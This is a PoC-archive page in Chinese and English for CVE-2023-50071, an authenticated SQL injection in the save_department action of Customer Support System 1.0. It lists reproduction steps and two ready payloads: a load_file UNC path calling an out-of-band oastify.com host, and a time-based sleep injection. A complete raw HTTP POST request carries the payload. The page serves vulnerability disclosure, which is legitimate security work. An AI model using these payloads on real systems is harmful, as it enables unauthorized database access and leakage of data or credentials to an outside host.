POC详情: 3a0b0d846a767519e89e12c1cdee486deeac4b96

来源
关联漏洞
标题: Customer Support System 安全漏洞 (CVE-2023-50071)
描述:Customer Support System是oretnom23个人开发者的一个客户支持系统,可以帮助某个企业或公司在客户从他们那里购买产品后提供客户支持。 Customer Support System 1.0版本存在安全漏洞,该漏洞源于文件/Customer_Support/ajax.php存在SQL注入漏洞。
描述
Multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via id or name.
介绍
# CVE-2023-50071
# Customer Support System 1.0 - Multiple SQL injection vulnerabilities - save_department

**Description**: Multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via id or name.

**Vulnerable Product Version**: Customer Support System 1.0  
**CVE Author**: Geraldo Alcantara  
**Date**: 29/11/2023  
**CVE**: CVE-2023-50071  
**CVE Link**: https://www.cve.org/CVERecord?id=CVE-2023-50071  
**NVD Link**: https://nvd.nist.gov/vuln/detail/CVE-2023-50071  
**Tenable Link**: https://www.tenable.com/cve/CVE-2023-50071  
**Confirmed on**: 15/12/2023  
**Tested on**: Windows  
### Steps to reproduce:  
1- Log in to the application.  
2- Navigate to the page /customer_support/index.php?page=department_list.  
3- Create or edit a department and  insert a malicious payload into one of the following parameters: id or name.  
**Payloads**:  
id: (select load_file('\\\\c7kwr16trd54p693ve9xjbaao1usii67.oastify.com\\test'))  
name: '+(select*from(select(sleep(20)))a)+'  

```
POST /customer_support/ajax.php?action=save_department HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------279004446431847057031125356738
Content-Length: 444
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=department_list
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l

-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="id"


-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="name"

test'+(select*from(select(sleep(20)))a)+'
-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="description"

Teste
-----------------------------279004446431847057031125356738--
```
Discoverer(s)/Credits:  
Geraldo Alcantara  
文件快照

[4.0K] /data/pocs/3a0b0d846a767519e89e12c1cdee486deeac4b96 └── [2.3K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。